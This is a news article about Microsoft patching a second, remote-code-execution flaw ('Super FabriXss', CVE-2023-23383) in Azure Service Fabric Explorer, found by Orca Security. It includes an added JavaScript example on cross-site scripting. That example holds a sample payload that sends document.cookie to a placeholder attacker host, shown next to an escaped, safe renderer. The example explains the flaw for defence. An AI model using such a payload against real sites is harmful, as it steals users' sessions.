Microsoft patches second Azure inspection tool vulnerability
Microsoft has patched a second, more severe vulnerability affecting a popular Azure inspection tool called Azure Service Fabric Explorer.
In October, researchers from Orca Security worked with Microsoft to release guidance on a bug nicknamed “FabriXss”: it affects the Service Fabric Explorer (SFX) tool and is a cross-site scripting (XSS) flaw, a class of vulnerability in which attacker-supplied script is injected into a page served by an otherwise benign and trusted website and then runs in victims' browsers with that site's privileges.
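To make the XSS class concrete, here is an added example that is not Service Fabric Explorer code and does not reproduce either FabriXss bug. It uses a hypothetical web UI template that echoes a user-controlled "display name" into HTML, shows the unsafe and the escaped rendering side by side, and includes a small structural check that counts how many tags the output contains. The attacker payload is a constructed sample; `attacker.example` is a placeholder host.

```javascript
// Added example of the cross-site scripting class described above.
// NOT Service Fabric Explorer code: the "displayName" field, the template and
// the payload are hypothetical stand-ins for any web UI that interpolates a
// user-controlled string into markup.

// Constructed sample input an attacker could submit as a display name.
// If it lands in the page unescaped, the onerror handler runs in the
// trusted site's origin and can read that site's cookies/session.
const ATTACKER_NAME =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Vulnerable rendering: raw string interpolation into HTML. The browser parses
// the attacker's <img> tag as part of the trusted page.
function renderStatusUnsafe(displayName) {
  return `<div class="node-status">Node: ${displayName}</div>`;
}

// Escape the characters that change meaning in HTML text and attribute
// contexts. '&' must be handled first so later replacements are not re-encoded.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hardened rendering: the same template, with the untrusted value escaped.
function renderStatusSafe(displayName) {
  return `<div class="node-status">Node: ${escapeHtml(displayName)}</div>`;
}

// Structural check: count opening tags in the rendered output. The template
// itself emits exactly one (<div>); anything beyond that came from the input.
function countTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

// Returns true when the rendered markup contains only the template's own tag.
function rendersWithoutInjectedTags(renderFn, input) {
  return countTags(renderFn(input)) === 1;
}

function demo() {
  const unsafe = renderStatusUnsafe(ATTACKER_NAME);
  const safe = renderStatusSafe(ATTACKER_NAME);
  return {
    unsafe,
    safe,
    unsafeInjected: !rendersWithoutInjectedTags(renderStatusUnsafe, ATTACKER_NAME),
    safeInjected: !rendersWithoutInjectedTags(renderStatusSafe, ATTACKER_NAME),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  const r = demo();
  console.log("unsafe :", r.unsafe, "| injected tag:", r.unsafeInjected);
  console.log("escaped:", r.safe, "| injected tag:", r.safeInjected);
}
```

Escaping on output is the minimum fix; in a real UI the same value must also be kept out of attribute, URL and script contexts, where plain HTML escaping is not sufficient, and a Content Security Policy limits what an injected handler can do if one slips through.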
One of the Orca Security researchers, Lidor Ben Shitrit, revealed on Thursday that he discovered a second vulnerability he dubbed “Super FabriXss.”
“With Super FabriXss, a remote unauthenticated attacker can execute code on a container hosted on one of the Service Fabric nodes,” Shitrit said. “This means that an attacker could potentially gain control of critical systems and cause significant damage.”
Microsoft Azure Service Fabric is a platform for distributed systems that enables the packaging, deployment, and management of stateless and stateful microservices and containers on a large scale. It is compatible with Windows and Linux operating systems, and can be deployed on any cloud, datacenter, or even on a personal laptop, spanning across geographic regions.
Microsoft tagged the bug as CVE-2023-23383 and thanked Orca for disclosing the issue before any customers were impacted.
“This was addressed with our March security release and customers who have automatic updates enabled, or have applied the update manually, are already protected,” a Microsoft spokesperson told Recorded Future News, adding that the bug has a CVSS score of 8.2.
Shitrit said the latest issue is much more dangerous than the vulnerability discovered in October because it allows attackers to achieve full remote code execution on a container without the need for authentication.
Shitrit explained in a blog post that the FabriXss vulnerability found in October affected both Linux and Windows clusters, whereas Super FabriXss affects only Windows clusters.
The blog post provides a more detailed walkthrough of how the bug can be exploited, and Shitrit urged organizations running Service Fabric Explorer version 9.1.1436.9590 to apply the fix manually if automatic updates are not enabled.
Jonathan Greig is a Breaking News Reporter at Recorded Future News. Jonathan has worked across the globe as a journalist since 2014. Before moving back to New York City, he worked for news outlets in South Africa, Jordan and Cambodia. He previously covered cybersecurity at ZDNet and TechRepublic.